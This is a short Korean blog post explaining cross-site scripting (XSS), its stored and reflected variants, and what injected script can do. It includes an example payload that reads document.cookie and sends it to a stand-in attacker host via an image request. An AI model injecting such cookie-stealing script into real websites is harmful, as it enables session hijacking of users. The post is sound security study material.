728x90
XSS란?
클라이언트 사이드 취약점 중 하나로, 공격자가 웹 리소스에 악성 스크립트를 삽입해 웹 브라우저에서 해당 스크립트를 실행할 수 있다.
예를 들어 게시글을 작성하는 곳에 <script> alert(1) </script> 와 같은 js코드를 넣는다면은 웹서버는 해당 스크립트를 실행하여 보여주므로 alert창이 뜨게 된다.
만약 script에 alert가 아닌 다른 공격할 수 있는 코드를 넣는다면은 심각한 취약점이 될것이다.
<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie;
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>
위는 쿠키 및 세션을 탈취하는 코드이다. 이외에 페이지를 변조하거나 위치를 이동시킬수 있는 공격코드를 작성할 수도 있다.
Stored XSS
Stored XSS는 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할때 발생하는 XSS이다.
대표적으론 게시물과 댓글에 악성 스크립트를 포함하여 업로드하는 방식이 있다.
Reflected XSS
Reflected XSS는 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생한다.
대표적으로 url에 스크립트를 포함하여 서버에 전송하는 방식이 있다.
728x90
반응형
'Web Hacking > Information' 카테고리의 다른 글
Non-Relational DBMS (비관계형 데이터베이스) (0) | 2024.04.10 |
---|---|
Cross Site Request Forgery (CSRF) 취약점 (0) | 2024.04.04 |
xss bypass html인코딩 (0) | 2024.04.03 |
Cookie & Session (쿠키와 세션) (0) | 2024.03.28 |
preg_match 함수 (1) | 2023.11.26 |